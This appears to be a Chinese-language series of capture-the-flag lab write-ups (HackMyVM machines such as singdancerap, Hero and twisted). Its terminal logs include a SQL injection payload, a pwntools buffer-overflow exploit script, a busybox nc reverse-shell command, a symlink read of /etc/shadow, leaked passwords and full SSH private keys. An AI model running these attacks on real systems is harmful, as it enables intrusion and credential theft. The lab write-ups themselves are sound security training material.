┌──(root㉿kali-plus)-[~]
└─# cat /root/.local/share/sqlmap/output/192.168.50.58/files/_var_www_he110wor1d_littlesecrets_login.php
<?php
// Database connection
$servername = "localhost";
$username = "root";
$password = "i_love_sing_dance_rap";
$dbname = "news_db";
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
$login_error = "";
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$username = $_POST['username'];
$password = $_POST['password'];
$sql = "SELECT id, username, password FROM users where username='$username'";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
$row = $result->fetch_assoc();
if ($password === $row['password']) {
session_start();
$_SESSION['user_id'] = $row['id'];
$_SESSION['username'] = $row['username'];
header("Location: manager.php");
exit();
} else {
$login_error = "Invalid username or password.";
}
} else {
$login_error = "Invalid username or password.";
}
}
$conn->close();
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
margin: 0;
padding: 0;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
.login-container {
background-color: #fff;
padding: 20px;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
width: 300px;
text-align: center;
}
.login-container h2 {
margin-bottom: 20px;
color: #333;
}
.login-container input[type="text"],
.login-container input[type="password"] {
width: 100%;
padding: 10px;
margin-bottom: 15px;
border: 1px solid #ccc;
border-radius: 5px;
font-size: 16px;
}
.login-container input[type="submit"] {
width: 100%;
padding: 10px;
background-color: #007BFF;
color: #fff;
border: none;
border-radius: 5px;
font-size: 16px;
cursor: pointer;
}
.login-container input[type="submit"]:hover {
background-color: #0056b3;
}
.login-container .error {
color: #ff0000;
margin-bottom: 15px;
}
</style>
</head>
<body>
<div class="login-container">
<h2>Login</h2>
<?php if (!empty($login_error)): ?>
<div class="error"><?php echo $login_error; ?></div>
<?php endif; ?>
<form action="login.php" method="POST">
<input type="text" name="username" placeholder="Username" required>
<input type="password" name="password" placeholder="Password" required>
<input type="submit" value="Login">
</form>
</div>
</body>
</html>
$sql = "SELECT id, username, password FROM users where username='$username'";通过这句话可以知道是单引号闭合的,可以构造payload
' union select 1,'he110wor1d_admin','pass
pass
这样的话,sql语句就变成了$sql = "SELECT id, username, password FROM users where username='' union select 1,'he110wor1d_admin','pass'";进去之后就有一个执行命令的输入框,可以反弹shell,拿到shell之后切换到he110wor1d用户,密码是i_love_sing_dance_rap
www-data@singdancerap:/home$ su he110wor1d
su he110wor1d
Password: i_love_sing_dance_rap
he110wor1d@singdancerap:/home$ id
id
uid=1001(he110wor1d) gid=1001(he110wor1d) groups=1001(he110wor1d)
he110wor1d@singdancerap:~$ ls
ls
thekey2root user.txt
he110wor1d@singdancerap:~$ cat user.txt
cat user.txt
#SQL injection can not only retrieve data but also forge it.
User flag:107883ee-f5e4-11ef-8542-005056207011
提权-root flag
在home目录下看到一个thekey2root目录,里面有一个thekey2root文件,cat了一下,发现没法查看,看了下内容,应该是一个二进制文件,把他搞下来看看
int __cdecl main(int argc, const char **argv, const char **envp)
{
system("echo 'input something:'");
input(&argc);
system("echo 'thanks for your input'");
return 0;
}
int input()
{
char v1[24]; // [esp+Ch] [ebp-1Ch] BYREF
return __isoc99_scanf("%s", v1);
}
int sing_dance_rap()
{
setuid(0);
setgid(0);
return system("echo 'Hey,bro! What are you looking for?'");
}
找了hyh大佬的wp,用了他的脚本
from pwn import *
# 设置上下文和程序路径
context(arch='i386', os='linux')
elf = ELF('./thekey2root') # 替换为你的程序名
# 获取函数地址
sing_dance_rap_addr = elf.symbols['sing_dance_rap']
system_addr = elf.plt['system']
# 通过调试获取v1的地址(例如:0xffffd0ac)
v1_addr = 0xffe8378c # 替换为实际地址
# 构造payload
payload = b'/bin/sh\x00' # 将/bin/sh写入缓冲区
payload += b'A' * (32 - len(payload)) # 填充至32字节
payload += p32(sing_dance_rap_addr) # 覆盖返回地址到sing_dance_rap
payload += p32(system_addr) # sing_dance_rap返回后执行system
payload += p32(0xdeadbeef) # system的返回地址(占位)
payload += p32(v1_addr) # system的参数,指向/bin/sh
# 启动进程并发送payload
p = process('./thekey2root')
p.send(payload) # 使用send而非sendline避免附加换行符
p.interactive() # 进入交互模式
┌──(root㉿kali-plus)-[~/singdancerap]
└─# chmod +x thekey2root
┌──(root㉿kali-plus)-[~/singdancerap]
└─# python3 exp.py
[*] '/root/singdancerap/thekey2root'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No
[+] Starting local process './thekey2root': pid 1360217
[*] Switching to interactive mode
input something:
$ ls
Hey,bro! What are you looking for?
[*] Got EOF while reading in interactive
$ ls
[*] Process './thekey2root' stopped with exit code -11 (SIGSEGV) (pid 1360217)
[*] Got EOF while sending in interactive
可以看到成功进入到了 sing_dance_rap 函数,现在要想办法控制 system 的参数由于 input 函数中的数组是在函数内部声明的,也就是一个局部变量,外部无法访问到,因此我们要寻找可以写入或者能利用的字符串,很遗憾并不存在,那就只能去查找现有的字符串了,C 语言中,如果是以字符串地址作为参数的话,那么函数会按照字节逐个读取,直到遇到 \0 才停止,而在上面可以看到的是在 0x804a03e 这个位置,也就是 s 的地址,后面刚好有一个 \x00,有了这个合法的字符串,接下来要做的就是体现在 linux 里面,因为实际上函数内执行的是 system(“s”),那么如果存在有一个 s 的二进制文件,而里面刚好有提权部分的代码,就可以执行命令,在本地调试一下,也是看了hyh大佬的wp,跟着一步步复现出来了
┌──(root㉿kali-plus)-[~/singdancerap]
└─# python3 exp1.py
[*] '/root/singdancerap/thekey2root'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No
[+] Opening connection to 192.168.50.58 on port 12345: Done
[*] Switching to interactive mode
input something:
$ ls
Hey,bro! What are you looking for?
$ ls
s
thekey2root
tmp
tmp1
tmp.py
$ ls
s
thekey2root
tmp
tmp1
tmp.py
$ id
uid=0(root) gid=0(root) groups=0(root),1001(he110wor1d)
$ pwd
/home/he110wor1d/thekey2root
$ cd ..
$ cd.
$
$ cd ..
$ cd ..
$ ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
$ cd root
$ ls
root.txt
$ cat root.txt
#During the process of PWN, the execution of the system function does not necessarily have to be bash.
root flag:943ac8c9-f696-11ef-8bd4-005056207011
这里有很多涉及到二进制相关的内容,所以二进制相关的知识也要多看看
Hero
ip地址为192.168.56.102
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.56.102 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 19:51 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.102
Host is up (0.0050s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
5678/tcp open rrac
MAC Address: 08:00:27:2A:F6:67 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 15.23 seconds
┌──(root㉿kali-plus)-[~]
└─# curl 192.168.56.102:80
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwgAAAJAczctSHM3L
UgAAAAtzc2gtZWQyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwg
AAAEAnYotUqBFoopjEVz9Sa9viQ8AhNVTx0K19TC7YQyfwAqiYY31x+ZMvvHfmGWC7ZE75
BbdbAKYEtIX75k6CL27CAAAACnNoYXdhQGhlcm8BAgM=
-----END OPENSSH PRIVATE KEY-----
拿到一个私钥,但是不知道用户名,使用ssh-keygen看一下
┌──(root㉿kali-plus)-[~]
└─# chmod 600 hero
┌──(root㉿kali-plus)-[~]
└─# ssh-keygen -y -f hero
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKiYY31x+ZMvvHfmGWC7ZE75BbdbAKYEtIX75k6CL27C shawa@hero
user flag
得到用户名是shawa,然后5678端口是一个n8n,把github地址扔给kimi让他给我总结了一下
n8n是一个工作流自动化平台,它将代码的灵活性与无代码的速度相结合。它具有400多个集成,原生的AI能力,以及公平代码许可,使用户能够在保持对数据和部署的完全控制的同时构建强大的自动化工作流。
主要功能和作用:
代码灵活性:用户可以在需要时编写JavaScript/Python代码,添加npm包,或使用可视化界面进行操作。
AI原生平台:用户可以基于LangChain构建AI代理工作流,并使用自己的数据和模型。
完全控制:用户可以选择自托管,遵循公平代码许可,或者使用n8n的云服务。
企业级功能:包括高级权限管理、单点登录(SSO)和空气隔离部署。
活跃的社区:提供400多个集成和900多个现成的模板。
快速启动:用户可以通过npx(需要Node.js)或Docker快速启动n8n。
资源丰富:提供文档、400多个集成、示例工作流、AI与LangChain指南、社区论坛和社区教程。
支持:用户可以在社区论坛中获得支持,并与其他用户交流。
许可模式:n8n采用公平代码许可,包括可持续使用许可和企业许可,允许用户始终查看源代码、随处部署,并添加自己的节点和功能。
贡献与团队:用户可以报告错误或提出功能建议,并查看贡献指南开始贡献。此外,用户也可以查看招聘信息加入n8n团队。
n8n的名称来源于“nodemation”,意为“节点自动化”,结合了Node.js和自动化的特点。
暂时先不管了,随便注册一下进去看看都有功能点,进去之后找到Overview-> Credentials->直接输入ssh他会自己检索对应的功能->输入之前得到的用户名和私钥,这里的ip不能是localhost或者是127.0.0.1,应该填172.17.0.1,因为他这个是在docker里面的->创建工作流,第一个是Trigger manually,第二个我们选择ssh(Execute Command),然后在命令那一栏输入反弹shell的命令busybox nc 192.168.56.102 1234 -e /bin/sh,然后就能拿到shawa用户的shell,然后拿到user flag
cd home
ls
shawa
cd shawa
ls
user.txt
cat user.txt
HMVOHIMNOTREAL
提权-root flag
想提权但是没有sudo,在查看sshd_config文件时发现他指定了banner文件的位置,在/opt/banner.txt
# no default banner path
Banner /opt/banner.txt
接下来可以使用ln -s /etc/shadow banner.txt命令来创建一个软链接用来读取用户名和密码的信息,当然也可以读取root/root.txt
先使用socat把端口转发出去,这样能搞一个交互式的shell
./socat TCP-LISTEN:2222,fork TCP4:172.17.0.1:22 &
然后就能ssh连接过去了
ssh shawa@192.168.0.205 -i key -p 2222
hero:~$ id
uid=1000(shawa) gid=1000(shawa) groups=1000(shawa)
cd /opt
rm banner.txt
ln -s /root/root.txt /opt/banner.txt
ssh shawa@192.168.0.205 -i key -p 2222
HMVNOTINPRODLOL
Welcome to Alpine!
也可以去拿root的密码,就是使用ln -s /etc/shadow banner.txt这个命令,ssh登录的时候可能需要-o StrictHostKeyChecking=no,登录进去的时候就会显示root用户的密码了
su root
Password: Imthepassthaty0uwant!
id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
ls
socat
user.txt
cd ..
cd ..
ls
bin
boot
dev
etc
home
lib
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
cd root
ls
root.txt
cat root.txt
HMVNOTINPRODLOL
twisted
信息搜集
ip地址为192.168.56.113
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.56.101
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:18 (Unknown: locally administered)
192.168.56.100 08:00:27:ee:f8:61 PCS Systemtechnik GmbH
192.168.56.113 08:00:27:94:94:44 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.005 seconds (127.68 hosts/sec). 3 responded
使用nmap对端口信息进行搜集
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.56.113 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-08 22:24 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.113
Host is up (0.0082s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
MAC Address: 08:00:27:94:94:44 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 12.61 seconds
user flag
80和2222端口是开放的,先看看80端口是什么情况,就是2张小猫的图片,没什么线索,扫一下目录看看,没扫出来什么目录,那应该就是那2张图片了
┌──(root㉿kali-plus)-[~]
└─# curl 192.168.56.113:80
<h1>I love cats!</h1>
<img src="cat-original.jpg" alt="Cat original" width="400" height="400">
<br>
<h1>But I prefer this one because seems different</h1>
<img src="cat-hidden.jpg" alt="Cat Hidden" width="400" height="400">
┌──(root㉿kali-plus)-[~]
└─# wget http://192.168.56.113/cat-original.jpg
--2025-04-08 22:35:48-- http://192.168.56.113/cat-original.jpg
正在连接 192.168.56.113:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:288693 (282K) [image/jpeg]
正在保存至: “cat-original.jpg”
cat-original.jpg 100%[==========================================================================================================>] 281.93K --.-KB/s 用时 0.03s
2025-04-08 22:35:48 (10.9 MB/s) - 已保存 “cat-original.jpg” [288693/288693])
┌──(root㉿kali-plus)-[~]
└─# wget http://192.168.56.113/cat-hidden.jpg
--2025-04-08 22:36:09-- http://192.168.56.113/cat-hidden.jpg
正在连接 192.168.56.113:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:288706 (282K) [image/jpeg]
正在保存至: “cat-hidden.jpg”
cat-hidden.jpg 100%[==========================================================================================================>] 281.94K --.-KB/s 用时 0.06s
2025-04-08 22:36:09 (4.72 MB/s) - 已保存 “cat-hidden.jpg” [288706/288706])
┌──(root㉿kali-plus)-[~]
└─# diff cat-original.jpg cat-hidden.jpg
二进制文件 cat-original.jpg 和 cat-hidden.jpg 不同
发现图片里面是有不同的,但是不知道使用什么工具去比较,看了一眼wp,使用的stegseek这个工具
使用教程:stegseek使用教程
┌──(root㉿kali-plus)-[~]
└─# stegseek -sf cat-hidden.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".
┌──(root㉿kali-plus)-[~]
└─# stegseek -sf cat-original.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".
┌──(root㉿kali-plus)-[~]
└─# cat cat-hidden.jpg.out
thisismypassword
┌──(root㉿kali-plus)-[~]
└─# cat cat-original.jpg.out
markuslovesbonita
得到这个应该是一个和一个提示,猜测ssh登录的用户名是markus,连上去试试
┌──(root㉿kali-plus)-[~]
└─# ssh markus@192.168.56.113 -p 2222
markus@192.168.56.113's password:
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
markus@twisted:~$ ls
note.txt
markus@twisted:~$ cat note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.
markus@twisted:~$ id
uid=1001(markus) gid=1001(markus) groups=1001(markus)
拿到一个提示并告诉我们bonita用户的密钥在/var/cache/apt/id_rsa,然后没思路了,看了下wp,发现使用的是getcap这个命令,getcap命令用于查看文件的capabilities,capabilities是一种权限分离机制,可以将root用户的全部权限分解为多个独立的capabilities,然后赋予给特定的进程或文件。这种机制可以提高系统的安全性,防止恶意进程获得过多的权限。
markus@twisted:/tmp$ /usr/sbin/getcap / -r 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
看不懂直接丢给ai
1. /usr/bin/ping = cap_net_raw+ep
- `/usr/bin/ping`文件被赋予了`cap_net_raw`和`cap_net_admin`能力。
- cap_net_raw:允许程序发送和接收原始网络数据包(如ICMP数据包,用于`ping`命令)。
- cap_net_admin:允许程序执行网络管理任务(如配置网络接口)。
- +ep:表示这些能力在“有效集”(Effective)和“许可能力集”(Permitted)中被启用。
2. /usr/bin/tail = cap_dac_read_search+ep
- `/usr/bin/tail`文件被赋予了`cap_dac_read_search`能力。
- cap_dac_read_search:允许程序绕过文件系统的访问控制,直接读取文件内容。这对于`tail`命令来说很重要,因为它需要访问某些受保护的文件(如系统日志)。
- +ep:同样表示这些能力在“有效集”和“许可能力集”中被启用。
这说明tail可以读id_rsa
markus@twisted:/tmp$ tail /var/cache/apt/id_rsa
mPbr04h5i9C3h81rh4sAHs9nVAEe3dmZtmZxoZPOJKRhAAAAgFD+g8BhMCovIBrPZlHCu+
bUlbizp9qfXEc8BYZD3frLbVfwuL6dafDVnj7EqpabmrTLFunQG+9/PI6bN+iwloDlugtq
yzvf924Kkhdk+N366FLDt06p2tkcmRljm9kKMS3lBPMu9C4+fgo9LCyphiXrm7UbJHDVSP
UvPg4Fg/nqAAAAgQD9Q83ZcqDIx5c51fdYsMUCByLby7OiIfXukMoYPWCE2yRqa53PgXjh
V2URHPPhqFEa+iB138cSgCU3RxbRK7Qm1S7/P44fnWCaNu920iLed5z2fzvbTytE/h9QpJ
LlecEv2Hx03xyRZBsHFkMf+dMDC0ueU692Gl7YxRw+Lic0PQAAAIEA82v3Ytb97SghV7rz
a0S5t7v8pSSYZAW0OJ3DJqaLtEvxhhomduhF71T0iw0wy8rSH7j2M5PGCtCZUa2/OqQgKF
eERnqQPQSgM0PrATtihXYCTGbWo69NUMcALah0gT5i6nvR1Jr4220InGZEUWHLfvkGTitu
D0POe+rjV4B7EYkAAAAOYm9uaXRhQHR3aXN0ZWQBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
但是这个tail是从后面开始读的,使用-n参数指定读取的行数,拿到密钥之后在本地写一个然后使用密钥连上去
markus@twisted:/tmp$ tail -n 100 /var/cache/apt/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA8NIseqX1B1YSHTz1A4rFWhjIJffs5vSbAG0Vg2iTa+xshyrmk6zd
FyguFUO7tN2TCJGTomDTXrG/KvWaucGvIAXpgV1lQsQkBV/VNrVC1Ioj/Fx3hUaSCC4PBS
olvmldJg2habNOUGA4EBKlTwfDi+vjDP8d77mF+rvA3EwR3vj37AiXFk5hBEsqr9cWeTr1
vD5282SncYtJb/Zx0eOa6VVFqDfOB7LKZA2QYIbfR7jezOdX+/nlDKX8Xp07wimFuMJpcF
gFnch7ptoxAqe0M0UIEzP+G2ull3m80G5L7Q/3acg14ULnNVs5dTJWPO2Fp7J2qKW+4A5C
tt0G5sIBpQAAA8hHx4cBR8eHAQAAAAdzc2gtcnNhAAABAQDw0ix6pfUHVhIdPPUDisVaGM
gl9+zm9JsAbRWDaJNr7GyHKuaTrN0XKC4VQ7u03ZMIkZOiYNNesb8q9Zq5wa8gBemBXWVC
xCQFX9U2tULUiiP8XHeFRpIILg8FKiW+aV0mDaFps05QYDgQEqVPB8OL6+MM/x3vuYX6u8
DcTBHe+PfsCJcWTmEESyqv1xZ5OvW8PnbzZKdxi0lv9nHR45rpVUWoN84HsspkDZBght9H
uN7M51f7+eUMpfxenTvCKYW4wmlwWAWdyHum2jECp7QzRQgTM/4ba6WXebzQbkvtD/dpyD
XhQuc1Wzl1MlY87YWnsnaopb7gDkK23QbmwgGlAAAAAwEAAQAAAQAuUW5GpLbNE2vmfbvu
U3mDy7JrQxUokrFhUpnJrYp1PoLdOI4ipyPa+VprspxevCM0ibNojtD4rJ1FKPn6cls5gI
mZ3RnFzq3S7sy2egSBlpQ3TJ2cX6dktV8kMigSSHenAwYhq2ALq4X86WksGyUsO1FvRX4/
hmJTiFsew+7IAKE+oQHMzpjMGyoiPXfdaI3sa10L2WfkKs4I4K/v/x2pW78HIktaQPutro
nxD8/fwGxQnseC69E6vdh/5tS8+lDEfYDz4oEy9AP26Hdtho0D6E9VT9T//2vynHLbmSXK
mPbr04h5i9C3h81rh4sAHs9nVAEe3dmZtmZxoZPOJKRhAAAAgFD+g8BhMCovIBrPZlHCu+
bUlbizp9qfXEc8BYZD3frLbVfwuL6dafDVnj7EqpabmrTLFunQG+9/PI6bN+iwloDlugtq
yzvf924Kkhdk+N366FLDt06p2tkcmRljm9kKMS3lBPMu9C4+fgo9LCyphiXrm7UbJHDVSP
UvPg4Fg/nqAAAAgQD9Q83ZcqDIx5c51fdYsMUCByLby7OiIfXukMoYPWCE2yRqa53PgXjh
V2URHPPhqFEa+iB138cSgCU3RxbRK7Qm1S7/P44fnWCaNu920iLed5z2fzvbTytE/h9QpJ
LlecEv2Hx03xyRZBsHFkMf+dMDC0ueU692Gl7YxRw+Lic0PQAAAIEA82v3Ytb97SghV7rz
a0S5t7v8pSSYZAW0OJ3DJqaLtEvxhhomduhF71T0iw0wy8rSH7j2M5PGCtCZUa2/OqQgKF
eERnqQPQSgM0PrATtihXYCTGbWo69NUMcALah0gT5i6nvR1Jr4220InGZEUWHLfvkGTitu
D0POe+rjV4B7EYkAAAAOYm9uaXRhQHR3aXN0ZWQBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
vi tmp
chmod 600 tmp
┌──(root㉿kali-plus)-[~]
└─# ssh bonita@192.168.56.113 -p 2222 -i tmp
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
bonita@twisted:~$ ls
beroot user.txt
bonita@twisted:~$ cat user.txt
HMVblackcat
提权 root flag
发现没有sudo,只有一个beroot文件
bonita@twisted:~$ file beroot
beroot: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fecfbde059505a54f66d3229cc9ebb78f997a7ba, not stripped
看样子是一个二进制文件,下载下来放ida里看看
int __fastcall main(int argc, const char **argv, const char **envp)
{
int v4; // [rsp+1Ch] [rbp-4h] BYREF
printf("Enter the code:\n ");
scanf("%i", &v4);
if ( v4 == 5880 )
{
setuid(0);
setgid(0);
system("/bin/bash");
}
else
{
puts("\nWRONG");
}
return 0;
}
可以得到答案是5880,然后就成功提权拿到root了
bonita@twisted:~$ ./beroot
Enter the code:
5880
root@twisted:~# id
uid=0(root) gid=0(root) groups=0(root),1002(bonita)
root@twisted:~# cd ..
root@twisted:/home# cd ..
root@twisted:/# cd root
root@twisted:/root# ls
root.txt
root@twisted:/root# cat root.txt
HMVwhereismycat
Runas
信息搜集
ip地址为192.168.50.242 扫一下端口
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.50.242 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-09 18:17 CST
Nmap scan report for runas-PC (192.168.50.242)
Host is up (0.00065s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 00:0C:29:33:3A:14 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 22.95 seconds
80端口有一个文件包含可以直接读flag
user flag
http://192.168.50.242/index.php?file=C:\Users\runas\Desktop\user.txt
HMV{User_Flag_Was_A_Bit_Bitter}
root flag
http://192.168.50.242/index.php?file=C:\Users\Administrator\Desktop\root.txt
HMV{Username_Is_My_Hint}
Reversteg
信息搜集
ip地址为192.168.56.104,使用rustscan对目标进行扫描
┌──(root㉿kali-plus)-[~]
└─# rustscan -a 192.168.56.104
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.104:22
Open 192.168.56.104:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-10 00:52 CST
Initiating ARP Ping Scan at 00:52
Scanning 192.168.56.104 [1 port]
Completed ARP Ping Scan at 00:52, 0.06s elapsed (1 total hosts)
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 0, OK: 0, NX: 0, DR: 0, SF: 0, TR: 0, CN: 0]
Initiating SYN Stealth Scan at 00:52
Scanning 192.168.56.104 [2 ports]
Discovered open port 22/tcp on 192.168.56.104
Discovered open port 80/tcp on 192.168.56.104
Completed SYN Stealth Scan at 00:52, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.56.104
Host is up, received arp-response (0.0026s latency).
Scanned at 2025-04-10 00:52:25 CST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:11:4B:D8 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
扫出来80和22,先看看80,80端口就是一个apache服务,扫一下目录但是啥也没得到,看源码看到最下面有一个提示
<!-- Some people always don't understand the format of photos. --> 和图片有关,在源码里还找到<!-- 117db0148dc179a2c2245c5a30e63ab0 --> 加一个.jpg就能得到一只猫的图片,加上.png又能得到一张一只猫的图片,把他们都下载下来,既然是图片,看看能不能用binwalk分离出来什么,分离出来的东西貌似没什么用,看看图片的exif信息
┌──(root㉿kali-plus)-[~/reversteg]
└─# exiftool 117db0148dc179a2c2245c5a30e63ab0.png
ExifTool Version Number : 12.76
File Name : 117db0148dc179a2c2245c5a30e63ab0.png
Directory : .
File Size : 379 kB
File Modification Date/Time : 2025:02:12 23:55:16+08:00
File Access Date/Time : 2025:04:10 01:20:43+08:00
File Inode Change Date/Time : 2025:04:10 01:16:49+08:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 648
Image Height : 486
Bit Depth : 8
Color Type : RGB
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Image Size : 648x486
Megapixels : 0.315
┌──(root㉿kali-plus)-[~/reversteg]
└─# exiftool 117db0148dc179a2c2245c5a30e63ab0.jpg
ExifTool Version Number : 12.76
File Name : 117db0148dc179a2c2245c5a30e63ab0.jpg
Directory : .
File Size : 191 kB
File Modification Date/Time : 2025:02:13 01:33:04+08:00
File Access Date/Time : 2025:04:10 01:20:51+08:00
File Inode Change Date/Time : 2025:04:10 01:16:58+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : 219f26695ac66c93de9de70eebeefea4deb071df71b9b7d7ebcc06eca47ff6e4
Image Width : 1280
Image Height : 960
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 1280x960
Megapixels : 1.2
得到的也没有可以利用的
┌──(root㉿kali-plus)-[~/reversteg]
└─# strings 117db0148dc179a2c2245c5a30e63ab0.jpg |tail
cXL>
sMO3N
$_oQP
[V'0K
^;R$[_
Y ?|
\xgG
o7p?
J^>_
TGlmZSBpcyBmdWxsIG9mIHNjZW5lcnksIGxvb2sgY2FyZWZ1bGx5
┌──(root㉿kali-plus)-[~/reversteg]
└─# echo TGlmZSBpcyBmdWxsIG9mIHNjZW5lcnksIGxvb2sgY2FyZWZ1bGx5 |base64 -d
Life is full of scenery, look carefully
jpg图片后面有个base64但是没什么用,线索应该就是在这2张图片里,但是没什么思路了,看了一下wp,使用zsteg这个工具一把梭能得到一个密码
工具安装
gem sources -l //查看现有yuan
gem sources --remove https://rubygems.org/ //删除现有源
gem sources -a http://gems.ruby-china.com/ //添加新源
apt-get install gem
gem install zsteg
直接一把梭
┌──(root㉿kali-plus)-[~/reversteg]
└─# zsteg 117db0148dc179a2c2245c5a30e63ab0.png
imagedata .. text: "\n\n\n\t\t\t\n\n\n"
b1,rgb,lsb,xy .. text: "morainelake"
b1,bgr,msb,xy .. file: OpenPGP Public Key
b2,r,lsb,xy .. text: "UUUUUUUU@"
b2,g,lsb,xy .. text: "E@UAUUUUUUUUj"
